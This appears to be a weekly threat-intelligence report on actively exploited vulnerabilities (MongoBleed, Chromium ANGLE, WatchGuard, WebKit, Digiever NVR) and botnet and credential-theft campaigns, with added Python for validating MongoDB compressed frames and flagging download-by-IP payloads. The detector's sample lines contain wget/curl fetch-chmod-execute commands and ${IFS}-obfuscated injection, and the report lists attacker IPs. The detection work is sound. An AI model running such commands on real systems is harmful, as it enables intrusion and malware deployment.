Executive Summary
The final week of 2025 reflected a more focused but persistent exploitation landscape, with only one new vulnerability added to the CISA KEV catalog, MongoBleed, highlighting active abuse of widely deployed database infrastructure. At the same time, continued exploitation was observed against previously listed KEV entries, including the end-of-life Digiever DS-2105 Pro NVR, underscoring how attackers continue to capitalize on unpatched and unsupported systems well beyond their initial disclosure.
Botnet operators including EnemyBot, Sysrv-K, Andoryu, and Androxgh0st intensified campaigns against exposed cloud services, routers, and web applications by abusing misconfigurations and unpatched systems.
At the same time, continued activity was observed from Operation PCPcat, the large-scale, highly automated credential theft campaign previously disclosed by the Beelzebub Research Team, which persisted in exploiting Next.js and React2Shell vulnerabilities to compromise cloud-hosted applications at scale.
Key points:
- MongoBleed vulnerability added to the CISA KEV catalog, reflecting recent exploitation activity.
- Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
- Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2025-14174 - Out-of-Bounds Memory Access Vulnerability in Google Chromium
An Out-of-Bounds Memory Access vulnerability in Google Chromium’s ANGLE graphics layer allowed remote attackers to trigger unauthorized memory access through a crafted HTML page, potentially impacting any Chromium-based browser such as Google Chrome, Microsoft Edge, and Opera. The flaw was initially tracked under Chromium issue ID 466192044, with details about the component and CVE assignment intentionally withheld. Evidence later confirmed that it was exploited as a zero-day in the wild, prompting urgent security responses. Google has issued patches in Chrome versions 143.0.7499.109/.110 for Windows and macOS and 143.0.7499.109 for Linux to mitigate the risk. The vulnerability has since been added to the CISA KEV catalog, underscoring its active exploitation and the need for immediate remediation.
CVE-2025-14733 - Out-of-Bounds Write Vulnerability in WatchGuard Firebox
An Out-of-Bounds Write vulnerability in WatchGuard Fireware OS allowed unauthenticated remote attackers to achieve arbitrary code execution by targeting the iked process responsible for IKEv2 negotiations on Firebox appliances. The flaw impacted both Mobile User VPN and Branch Office VPN configurations using IKEv2 with dynamic gateway peers, exposing critical perimeter infrastructure. WatchGuard linked active exploitation to IPs 45.95.19[.]50, 51.15.17[.]89, 172.93.107[.]67, and 199.247.7[.]82, released Indicators of Attack for detection, and issued multiple patched versions. The issue has since been added to the CISA KEV catalog, underscoring confirmed in-the-wild abuse.
CVE-2025-14847 - Improper Handling of Length Parameter Inconsistency Vulnerability in MongoDB and MongoDB Server
An Improper Handling of Length Parameter Inconsistency vulnerability in MongoDB and MongoDB Server, codenamed MongoBleed, allowed unauthenticated attackers to remotely leak sensitive data from server memory by abusing flaws in the zlib-based message compression and decompression logic. By sending specially crafted compressed network packets, attackers could trigger the server to return uninitialized heap memory, exposing credentials, API keys, cached queries, and other sensitive artifacts without requiring authentication or user interaction. Because zlib compression is enabled by default, the issue impacted a wide range of MongoDB versions across cloud and on-premises deployments, with more than 87,000 potentially vulnerable instances identified globally. The flaw posed heightened risk to internet-exposed databases due to its pre-authentication reachability and low exploitation complexity. MongoDB addressed the issue in updated releases, and the vulnerability was added to the CISA KEV catalog, confirming active exploitation in the wild.
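The bug class named above is a disagreement between the length a compressed message declares and the bytes that decompression actually yields. As an added illustration of the defensive check (this is not MongoDB's code and does not reproduce the MongoBleed defect itself), the Python below parses a MongoDB OP_COMPRESSED wire frame and refuses any frame whose declared uncompressedSize, messageLength, or stream end does not match what is on the wire; build_op_compressed is a constructed test fixture, and the 48,000,000-byte bound is the maxMessageSizeBytes value mongod advertises.

```python
import struct
import zlib

OP_COMPRESSED = 2012       # wire opcode of a compressed frame
OP_MSG = 2013              # opcode of the inner message used by the fixture
COMPRESSOR_ZLIB = 2        # compressor id for zlib
HEADER_LEN = 16            # MsgHeader: messageLength, requestID, responseTo, opCode
MAX_MESSAGE = 48_000_000   # sanity bound: mongod's advertised maxMessageSizeBytes

def build_op_compressed(body: bytes, declared_size=None, request_id=1) -> bytes:
    """Constructed fixture: wrap `body` in an OP_COMPRESSED frame using zlib.
    declared_size normally equals len(body); tests pass a wrong value to get a
    length-inconsistent frame that the validator must reject."""
    if declared_size is None:
        declared_size = len(body)
    payload = struct.pack("<iiB", OP_MSG, declared_size, COMPRESSOR_ZLIB)
    payload += zlib.compress(body)
    header = struct.pack("<iiii", HEADER_LEN + len(payload), request_id, 0,
                         OP_COMPRESSED)
    return header + payload

def decode_op_compressed_strict(msg: bytes):
    """Return (originalOpcode, inflated_body) only when every length field
    agrees with the bytes actually present; raise ValueError otherwise."""
    if len(msg) < HEADER_LEN + 9:
        raise ValueError("frame shorter than an OP_COMPRESSED header")
    msg_len, _req, _resp, opcode = struct.unpack_from("<iiii", msg, 0)
    if opcode != OP_COMPRESSED:
        raise ValueError("not an OP_COMPRESSED frame")
    if msg_len != len(msg) or msg_len > MAX_MESSAGE:
        raise ValueError("messageLength disagrees with bytes on the wire")
    orig_op, declared, comp_id = struct.unpack_from("<iiB", msg, HEADER_LEN)
    if comp_id != COMPRESSOR_ZLIB:
        raise ValueError(f"compressor id {comp_id} not handled here")
    if not 0 < declared <= MAX_MESSAGE:
        raise ValueError("declared uncompressedSize out of range")
    # Inflate with the output capped at the declared size (so a stream that
    # expands further cannot exhaust memory), then demand an exact match:
    # no short output, no unfinished stream, no leftover input.
    inflater = zlib.decompressobj()
    body = inflater.decompress(msg[HEADER_LEN + 9:], declared)
    if (len(body) != declared or not inflater.eof
            or inflater.unused_data or inflater.unconsumed_tail):
        raise ValueError("uncompressedSize does not match inflated output")
    return orig_op, body

def frame_is_consistent(msg: bytes) -> bool:
    """Boolean wrapper for monitoring code that only needs pass/fail."""
    try:
        decode_op_compressed_strict(msg)
        return True
    except ValueError:
        return False
```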
CVE-2025-43529 - Use-After-Free WebKit Vulnerability in Apple Multiple Products
A Use-After-Free vulnerability in Apple's WebKit engine affected multiple products, including iOS, iPadOS, macOS Tahoe, tvOS, watchOS, visionOS, and Safari, and allowed remote code execution when processing maliciously crafted web content. Apple confirmed that the flaw discovered by Google’s Threat Analysis Group impacted any HTML parser relying on WebKit, extending risk beyond native Apple platforms to third-party products embedding WebKit. Although technical details were withheld, Apple acknowledged that CVE-2025-43529 and CVE-2025-14174 may have been exploited in an extremely sophisticated, targeted spyware campaign against individuals on versions of iOS prior to iOS 26. The vulnerability has been resolved in iOS/iPadOS 26.2, iOS/iPadOS 18.7.3, macOS Tahoe 26.2, tvOS 26.2, watchOS 26.2, visionOS 26.2, and Safari 26.2. It was recently added to the CISA KEV catalog, following confirmation of in-the-wild exploitation.
CVE-2023-52163 - Missing Authorization Vulnerability in Digiever DS-2105 Pro
A Missing Authorization vulnerability in the DigiEver DS-2105 Pro NVR allowed attackers to perform command injection via the time_tzsetup.cgi endpoint, leading to remote code execution. The device, widely used in surveillance environments for managing IP camera feeds, had reached end-of-life and was no longer supported by the vendor, leaving no official patch available. Although exploitation required an authenticated session, attackers were observed abusing weak controls to deploy malware and compromise exposed systems. The flaw has since been added to the CISA KEV catalog, prompting guidance to avoid internet exposure and rotate default credentials immediately.
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
What botnet activity was observed this week?
Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as wget commands fetching from specific IP addresses, highlighting ongoing automated exploitation campaigns.
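The "wget with a specific IP address" pattern mentioned above is simple to turn into a triage rule. The Python below is an added example, not part of the report or of any Loginsoft tooling: it normalizes a request line, flags a fetch tool followed by an IPv4 literal, and notes whether the fetched file is executed afterwards. The sample request lines are constructed and use RFC 5737 documentation addresses.

```python
import ipaddress
import re
from urllib.parse import unquote

# A fetch tool followed, within the same shell command, by an IPv4 literal.
FETCH_RE = re.compile(r"\b(wget|curl|tftp)\b[^;&|]*?((?:\d{1,3}\.){3}\d{1,3})", re.I)
# Execution of the downloaded file after the fetch step.
EXEC_RE = re.compile(r"(chmod\s+\+?x|\bsh\s|\bbash\s|\./\S+)", re.I)

def normalize(payload: str) -> str:
    """Undo the cheap encodings web exploit payloads commonly arrive in."""
    text = unquote(unquote(payload))      # second pass handles %25xx double encoding
    return text.replace("${IFS}", " ").replace("$IFS", " ")

def classify_payload(payload: str):
    """Return a finding for a download-by-IP payload, or None for anything else."""
    text = normalize(payload)
    match = FETCH_RE.search(text)
    if not match:
        return None
    tool, ip_text = match.group(1).lower(), match.group(2)
    try:
        stager = ipaddress.ip_address(ip_text)   # rejects octets above 255
    except ValueError:
        return None
    return {
        "tool": tool,
        "stager_ip": str(stager),
        "executes": bool(EXEC_RE.search(text[match.end():])),
    }

def scan(lines):
    """Pair each flagged request line with its finding."""
    results = []
    for line in lines:
        finding = classify_payload(line)
        if finding is not None:
            results.append((line, finding))
    return results

# Constructed sample request lines (not observed traffic).
SAMPLE_LINES = [
    "GET /shell?cd%20/tmp;wget%20http://203.0.113.10/x86;chmod%20+x%20x86;./x86",
    "POST /cgi-bin/setup.cgi cmd=curl${IFS}-o${IFS}/tmp/a${IFS}http://198.51.100.7/a",
    "GET /api/health?probe=curl+https://status.example.com/ping",
]

if __name__ == "__main__":
    for line, finding in scan(SAMPLE_LINES):
        print(finding, "<-", line)
```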
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
Emergence of Operation PCPcat
Beelzebub Research Team reported the discovery of "Operation PCPcat", a highly automated and efficient credential theft campaign that weaponized vulnerabilities in the Next.js and React frameworks to compromise cloud-hosted web applications at scale. Identified through a Docker honeypot, the operation exploited CVE-2025-29927 and CVE-2025-55182 to breach 59,128 servers in less than 48 hours, demonstrating an unusually high success rate compared to typical mass-scanning campaigns. The activity reflected precision targeting rather than opportunistic “spray and pray” attacks, underscoring the campaign’s operational maturity and impact. Organizations operating public-facing Next.js or React services were urged to apply patches immediately, block the command-and-control address 67.217.57(.)240, and rotate any credentials exposed through environment files to contain potential compromise.
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Conclusion
Taken together, this week’s observations illustrated how threat actors continued to combine abuse of legacy, end-of-life systems with rapid weaponization of newly disclosed application flaws to expand their impact. The increasingly narrow window between disclosure and active exploitation underscored the need for continuous visibility and faster response across complex environments. Loginsoft Vulnerability Intelligence (LOVI) supports this shift by continuously tracking exploitation trends, highlighting high-risk exposures, and enabling timely action before threats escalate. Through real-time intelligence and contextual insights, LOVI helps organizations stay resilient against both long-standing and emerging attack vectors.
FAQs:
1) What is React2Shell and why is it appealing for threat actors?
A) React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.
2) How does LOVI help organizations manage vulnerabilities effectively?
A) Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.
3) What is MongoDB?
A) MongoDB is a widely used NoSQL database that stores data in flexible BSON (Binary JSON) documents instead of fixed tables. It is designed to handle large volumes of structured and unstructured data with high performance. MongoDB is commonly deployed across cloud and on-premises environments to support scalable, highly available, and distributed applications.
4) What is Cytellite?
A) Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.